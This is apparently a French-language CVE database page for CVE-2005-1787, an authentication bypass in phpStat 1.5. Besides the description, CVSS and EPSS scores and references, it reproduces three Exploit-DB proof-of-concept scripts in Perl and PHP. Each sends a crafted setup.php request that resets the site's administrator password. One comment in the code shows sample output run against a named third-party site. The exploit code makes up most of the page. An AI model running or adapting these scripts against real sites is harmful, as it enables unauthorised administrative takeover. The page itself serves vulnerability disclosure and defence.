CVE-2005-1787 : Détail

CVE-2005-1787

A03-Injection
1.77%V3
Network
2005-05-31
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

setup.php in phpStat 1.5 allows remote attackers to bypass authentication and gain administrator privileges by setting the $check variable.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1016

Date de publication : 2005-05-29 22h00 +00:00
Auteur : Alpha_Programmer
EDB Vérifié : Yes

#!/usr/bin/perl ##################################################################### #T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ##################################################################### # EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability # #Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v ) #E-Mail : [email protected] # #This Xpl Change Admin's Pass in This Portal !! #Discovered by: SoulBlack # #Vulnerable Version : phpStat 1.5 # ##################################################################### # Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com # # So Iranian Hacking & Security Teams : # # Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT ##################################################################### use IO::Socket; if (@ARGV < 3) { print "\n==========================================\n"; print " \n -- Exploit By Alpha Programmer --\n\n"; print " Trap-Set UnderGrounD Hacking Team \n\n"; print " Usage: <T4rg3t> <DIR> <Password>\n\n"; print "==========================================\n\n"; print "Examples:\n\n"; print " phpStat.pl www.Site.com /phpstat/ 12345\n"; exit(); } my $host = $ARGV[0]; my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); unless ($remote) { die "C4nn0t C0nn3ct to $host" } print "C0nn3cted\n"; $http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n"; $http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n"; $http .= "Host: $host\n\n\n\n"; print "[+]Sending H3ll Packet ...\n"; print $remote $http; sleep(1); print "[+]Wait For Authentication Bypass ...\n"; sleep(100); while (<$remote>) { } print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n"; print "[+]User: admin\n"; print "[+]Pass: $ARGV[2]"; # milw0rm.com [2005-05-30]
Exploit Database EDB-ID : 1017

Date de publication : 2005-05-29 22h00 +00:00
Auteur : mh_p0rtal
EDB Vérifié : Yes

<?php error_reporting(E_PARSE); /* ================================================================ PHP Stat Administrative User Authentication Bypass POC Exploit ================================================================ ====Trap-Set Underground Hacking Team===========mh_p0rtal============ Greetz to : Alpha_programmer , Oil_karchack , Str0ke And Iranian Hacking & Security Teams : Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam , CrouZ Security Team , Simorgh-ev Security Team , ====================^^^^^^^^^^^^^^^^^^^-========================= */ # Config ________________________________ # address - example: http://www.site.com/setup.php Or www.site.com /dir/setup.php $url = "http://www.site.com/setup.php"; # EnD ___________________________________ print "<form action=\"$url?check=yes&username=$username&password=$password\" >"; print "<input type=\"hidden\" name=\"check\" value=\"yes\">"; print "Username : <input type=\"text\" name=\"username\" value=\"admin\" size=\"25\"><br>"; print "Password : <input type=\"text\" name=\"password\" value=\"abc123\" size=\"25\"><br>"; print ("<input type=submit value=::Change. > \n"); print "</form>"; //------------------------------------------------------End. ?> # milw0rm.com [2005-05-30]
Exploit Database EDB-ID : 1018

Date de publication : 2005-05-29 22h00 +00:00
Auteur : Nikyt0x
EDB Vérifié : Yes

<? /* ************************************************************** PHP Stat Administrative User Authentication Bypass POC Exploit Code by Nikyt0x - Soulblack Security Research ************************************************************** Advisory: http://www.soulblack.com.ar/repo/papers/phpstat_advisory.txt Saludos: Soulblack Staff, Status-x, NeosecurityTeam, KingMetal, SWP, Trespasser... [email protected] http://www.nikyt0x.tk ************************************************************** **This Exploit Change Admin Username and Password **Username: admin **Password: admin ************************************************************** php sbphpstatpoc.php www.spazfarm.com /spazstats/setup.php ============================================================== PHP Stat Administrative User Authentication Bypass POC Exploit ============================================================== by Nikyt0x - Soulblack Security Research [+] Testing: www.spazfarm.com [+] Socket [+] Sending Exploit [+] OK Open www.spazfarm.com/spazstats/setup.php Username: admin Password: 123456 ************************************************************** */ // username and password $username = "admin"; $password = "123456"; function sh0w() { echo "\n ==============================================================\n"; echo " PHP Stat Administrative User Authentication Bypass POC Exploit\n"; echo " ==============================================================\n"; echo " by Nikyt0x - Soulblack Security Research\n\n"; } if ($argc != 3) { sh0w(); echo "\n\n Usage:\n sbphpstatpoc.php www.site.com /dir/to/setup.php\n"; exit(); } if(!ereg('setup.php',$argv[2])) { echo "URL to setup.php Incorrect.\n"; exit(0); } sh0w(); echo " [+] Testing: $argv[1]\n"; $s0ck3t = fsockopen($argv[1], 80); if (!$s0ck3t) { echo " [-] Socket\n"; exit(0); } else { $petici0n = "GET $argv[2]?check=yes&username=$username&password=$password HTTP/1.1\r\n"; $petici0n .= "Host: $argv[1]\r\n"; $petici0n .= "Connection: Close\r\n\r\n"; echo " [+] Socket\n"; if(!fwrite($s0ck3t, $petici0n)) { echo " [-] Sending Exploit\n"; exit(0); } echo " [+] Sending Exploit\n"; while (!feof($s0ck3t)) { $g3tdata = fgets($s0ck3t, 1024); if (eregi('Setup has been updated',$g3tdata)) { echo " [+] OK\n\n"; echo " Open $argv[1]$argv[2]\n\n Username: $username\n Password: $password\n"; exit(); } } fclose($s0ck3t); } ?> # milw0rm.com [2005-05-30]

Products Mentioned

Configuraton 0

Phpstat>>Phpstat >> Version -

    Références

    http://marc.info/?l=bugtraq&m=111721290726958&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ
    http://securitytracker.com/id?1014064
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/15516
    Tags : third-party-advisory, x_refsource_SECUNIA